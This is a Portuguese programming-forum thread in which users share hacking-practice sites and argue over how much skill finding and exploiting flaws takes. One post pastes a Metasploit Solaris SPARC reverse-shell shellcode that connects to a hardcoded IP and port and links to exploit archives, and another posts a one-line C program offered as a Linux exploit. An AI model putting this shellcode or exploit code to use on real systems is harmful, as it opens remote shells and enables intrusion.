Jump to content
  • Revista PROGRAMAR: Já está disponível a edição #60 da revista programar. Faz já o download aqui!

fpinto

Sites de Hacking Training

Recommended Posts

djthyrax

Peço desculpa, www.tentehackear.org


Não peças ajuda por PM! A tua dúvida vai ter menos atenção do que se for postada na secção correcta do fórum!

Share this post


Link to post
Share on other sites
karva

E ninguém fala no que é o provavelmente mais conhecido: www.hackthissite.org


Proud LEIC-A@IST student!

Share this post


Link to post
Share on other sites
rafinha69

muito obrigado, assim aqueles lammer a tentar ser hackers algum dia param de invadir computadores de senhoras idosos, e praticam num servidor proprio

Share this post


Link to post
Share on other sites
herakty
alem do www.hackerskills.com algum conhece mais algum site do genero???

ui ui ui... e que tal um "idiots guide to child pre-neo-hackers"???

por acaso até há uma excelente area nesta comunidade que alguem criou há algum tempo atras e encheu de bons conteudos... na secção de segurança do P@P podes aprender mesmo muito sobre segurança... há quem diga que até se revela demais  😎

a palavra hacker não significa o que se procupa... hacker é ser-se bom em qualquer area... resolver o problema com uma unica machada (à letra)

mas digo... saber se segurança em 3 pontos:

-domingar redes

-dominar sistemas operativos

-dominar programação

e não conheço nenhum caminho facil para qualquer destes pontos... só muitos anos de estudo intenso..

teckV

Share this post


Link to post
Share on other sites
djthyrax

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.


Não peças ajuda por PM! A tua dúvida vai ter menos atenção do que se for postada na secção correcta do fórum!

Share this post


Link to post
Share on other sites
Hipnoted

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.

Acho que percebeste mal o que ele disse. Encontrar falhas em software qualquer um encontra... Agora perceber o seu funcionamento e encontrar possíveis soluções para essas falhas nem qualquer um consegue.


"Nunca discutas com um idiota. Eles arrastam-te até ao seu nível e depois ganham-te em experiência"

Share this post


Link to post
Share on other sites
herakty
Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa

realmente é preciso ter muita calma e sangue frio para ler coisas destas... conseguem sempre impressionar pela negativa e quando se pensava já se ter ouvido tudo

contextualizando...

estavamos a falar de que? testes de qualidade? bugs do tipo, deveria dar um resultado de 10 e dá 100? ou estamos a falar de segurança informática?

baralha.se mesmo muita coisa

tendo em conta que estavamos a falar de segurança informática (que é muito mais que descobrir vulnerabilidades e aplicar exploits. era disto que falavas com as falhas de software?) e dando como referencia os conteudos de certificações como  o CEH (Certified ethical hacker) é clara a afirmação que fiz... ser-se especialista de seg. inf. (uma especialização no ramo de informática) é dominar tudo nas TI... nunca se sabe o que está no alvo, que técnica vamos ter de usar, que SO crakar, que equipamento de rede ou protocolo é preciso manipular, que programa exploitar e com que linguagem... enfim... só que não se sabe do que se fala pode afirmar o que afirmou

até para simples sniff de rede é preciso conhecer bem redes e protocolos

nota-se o fenomeno de "ler um ou outro artigo por ai e pensar que se domina algo"

e sobre as tais falhas. (antes demais, o que é ter 2 dedos de testa? é fazer-se certas afirmações? h3h3h3h3 não sou crente)

XSS - dominar tecnologias de programação web

SQL Injection - dominar tecnologias de programação web e SQL no geral

Overruns, overflows e afins - ser-se mais que um mestre, dominio completo de aquitecturas de computadores, SOs e programação no seu prisma mais hard (para mim quem mexe aqui é um autentico heroi, só não dá valor quem nunca fez nada disto)

já viste algum exploit e respectiva analise da vulnerabilidade? e agora diz-me... conheces alguem ou já falaste com alguem que têm estas capacidades? não sabes mesmo do que estas a falar

diz-me que conhecimentos necessitas para entender isto... nem te pergunto para descobrir e criar

http://www.milw0rm.com/exploits/7132'>http://www.milw0rm.com/exploits/7132

http://downloads.securityfocus.com/vulnerabilities/exploits/wmf_exp.c

# solaris_sparc_reverse -  LHOST=66.240.213.81 LPORT=4321 Size=196 Encoder=Sparc http://metasploit.com
my $shellcode =
"\x23\x3a\x59\xac\xa2\x14\x62\xe5\x20\xbf\xff\xff\x20\xbf\xff\xff".
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20".
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04".
"\x75\x4d\x12\xe2\x1d\x82\x72\xed\x8b\xb8\xb2\xe6\x27\xa7\xf2\xf3".
"\xd5\xc7\xd3\x01\x49\xf8\x33\x07\xeb\xe8\x13\xe1\x7d\xd8\x73\xe5".
"\xad\xfb\xcc\x0d\xd9\xec\x13\xee\x70\x1c\x73\xf9\xe0\xbe\xd3\xf8".
"\x8a\xaf\x33\xc4\x1b\x1f\x14\x30\x0e\x20\xab\xbc\xff\x5c\xeb\xc4".
"\xde\x63\x14\xb0\x80\x77\x34\x59\xe3\x67\x89\xac\x41\x93\x90\x9f".
"\x65\xa7\xec\xef\xf7\xfb\xb3\x1f\x63\xeb\x93\x0f\x0e\x1b\xf3\xc4".
"\x9f\xcb\xd4\x12\x0b\xf6\xd4\x29\x15\x0d\x0c\xb7\xf5\x06\x8d\xa9".
"\xd6\x2d\x12\xef\x88\x11\x0b\x1f\x3a\x75\xeb\x17\xda\x42\x54\xd7".
"\xca\x96\x14\xef\x2a\xfa\xd4\xf3\x28\xed\x0b\x30\xbc\xdd\x6b\x4e".
"\xbe\xdd\x6b\x4e";

como é obvio... TODO O MUNDO DOMINA ISTO.... h3h3h3h3h3h3h3h3h3h33h3h3h3h3h3h3h3h33h3h3h

e só mostrei o shellcode porque mostrar como se descobrem vulnerabilidade nem num livro completo.

para explorar:

http://www.metasploit.com/

http://www.milw0rm.com/

teckV  - on the run

Share this post


Link to post
Share on other sites
DEMOz

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.

Estás super bem... ENGANADO!

Sim é verdade, precisas de pelo menos dois dedos de testa, mas bem preenchidos com Redes...

Vê só o exemplo acima dado pelo "herakty".

E em muitos casos isto não é nada!

Não se faz assim as três pancadas, precisas de "fritar muito neurónio"...

Share this post


Link to post
Share on other sites
djthyrax

Lol, vocês sabem ler? Eu disse detectar falhas, não disse explorá-las. Mas enfim.


Não peças ajuda por PM! A tua dúvida vai ter menos atenção do que se for postada na secção correcta do fórum!

Share this post


Link to post
Share on other sites
herakty
Lol, vocês sabem ler? Eu disse detectar falhas, não disse explorá-las. Mas enfim.

Sites de Hacking Training - mas não é este o topico em que estamos a falar? e hacking é detectar falhas?

já agora apresento uma definição de hacker muito interessante que vi na apresentação do evento FRHACK

International IT Security Conference

Hacker

1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. RFC1392, the Internet Users' Glossary, usefully amplifies this as: A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular.

2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.

3. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.

Share this post


Link to post
Share on other sites
DEMOz

Sites de Hacking Training - mas não é este o topico em que estamos a falar? e hacking é detectar falhas?

Ora ai está, foi exactamente o que eu entendi também.

Uma coisa é Hacking e outra é apenas a detecção de falhas...

Se te referes apenas a detecção de falhas, sim é bem mais fácil que Hacking...

Mas mesmo assim em alguns casos é complicado.

Share this post


Link to post
Share on other sites
herakty
Se te referes apenas a detecção de falhas, sim é bem mais fácil que Hacking...

Mas mesmo assim em alguns casos é complicado.

estou contigo... e repara-se que há pessoas que confundem "exploitation" com detecção de falhas... onde eu trabalho é o dep. de qualidade, com pessoas não especializadas, que detectam falhas/bugs

agora... há algo completamente diferente que é "exploitation"... muito poucas falhas são passiveis de exploitation... e essas só estão ao nivel de QUEM DOMINA

ex:

XSS

SQL-Injection

Buffer overflows

Buffer-overruns

e nestas só quem DOMINA programação e muitas delas tambem redes... em ambientes WEB é quase sempre necessário conhecimentos de redes

teckV

Share this post


Link to post
Share on other sites
zepreto

e só mostrei o shellcode porque mostrar como se descobrem vulnerabilidade nem num livro completo.

descobrir vulnerabilidades pode ser tao facil como exploita-las, de qualquer modo o que o outro diz é verdade, só precisas de 2 dedos de testa.

pra hackar merdas nem 2 dedos de testa precisas...

Share this post


Link to post
Share on other sites
herakty
pra hackar merdas nem 2 dedos de testa precisas...

antes demais estas afirmações são uma ofensa e uma falta de respeito para quem realmente mexe nessa area... a sério

depois mostra que quem escreve isso não faz a minima ideia do que está a falar, o que sinceramente acho estranho... o que levara alguem a opiniar sobre algo que não têm a minima ideia?

diz me uma coisa... quando dizes isto "pra hackar merdas " estás a falar concretamento do quê?

é que estavamos a falar de exploits e não de hacks. hack é algo muito bem feito, aquela linha de código que resolve maravilhosamente e com beleza o problema

mas a nivel de black hat quando dizes "pra hackar merdas " falas do quê concretamente?

é que eu ha muito tempo que lido nessa area e tenho lidado com tanta vertente e vector que fico parvo quando alguem fala assim...

portantos quando dizes "hackar cenas" refereste a??

2º pergunta... se é tão simples podes mostrar um exemplo pratico e concreto? basta mostrares as questões técnias que eu vou entendelas...

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

aguardo ansiosamente, é que ainda nunca encontrei alguem no mundo que achasse isso... estou ansioso por te conhecer que és um fenomeno :P

teckV

Share this post


Link to post
Share on other sites
zepreto

antes demais estas afirmações são uma ofensa e uma falta de respeito para quem realmente mexe nessa area... a sério

depois mostra que quem escreve isso não faz a minima ideia do que está a falar, o que sinceramente acho estranho... o que levara alguem a opiniar sobre algo que não têm a minima ideia?

diz me uma coisa... quando dizes isto "pra hackar merdas " estás a falar concretamento do quê?

é que estavamos a falar de exploits e não de hacks. hack é algo muito bem feito, aquela linha de código que resolve maravilhosamente e com beleza o problema

mas a nivel de black hat quando dizes "pra hackar merdas " falas do quê concretamente?

é que eu ha muito tempo que lido nessa area e tenho lidado com tanta vertente e vector que fico parvo quando alguem fala assim...

portantos quando dizes "hackar cenas" refereste a??

2º pergunta... se é tão simples podes mostrar um exemplo pratico e concreto? basta mostrares as questões técnias que eu vou entendelas...

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

aguardo ansiosamente, é que ainda nunca encontrei alguem no mundo que achasse isso... estou ansioso por te conhecer que és um fenomeno :P

teckV

rotfl, fazer um exploit para o directshow ? WOW. BRUTAL, CLIENT SIDE VULNS NO IE! BRUTAL ! !!!!!! FODIDISSIMO! aposto que nem enxergas qual é o clsid :D = rotfl :thumbsup:

quanto a hackar merdas, bom, pode ser muita coisa...mas la está, pra hackar merdas não é preciso necessáriamente fazer exploits :P nem sequer saber como funcionam....podes chamar-lhes script kiddies, se quiseres. lol

queres exploits meus ? deves estar enganado em relação a quem os estas a pedir :P

mas como fui tão bem sucedido em irritar-te, fica aqui um pra linux abaixo do 2.6.7, só pra gozar com a tua cara:

int main(int argc,char **argv){return chown(argv[1],-1,atoi(argv[2]));}

ui...fdx, ainda estou a suar de ter escrito a linha acima....escrever exploits é dificilimo!

Share this post


Link to post
Share on other sites
zepreto

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

e já agora, se achas isto do directshow assim tão brutal, és capaz de não estar a acompanhar as vulns do IE assim à tanto tempo quanto dizes :P

Share this post


Link to post
Share on other sites
HecKel

zepreto, podias controlar-te pelo menos na linguagem, sff? Isto não é o café onde mandas as postas de pescada que bem te apetece e da forma como te apetece. Argumenta, responde mas mantém o nível, sff.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×

Important Information

By using this site you accept our Terms of Use and Privacy Policy. We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.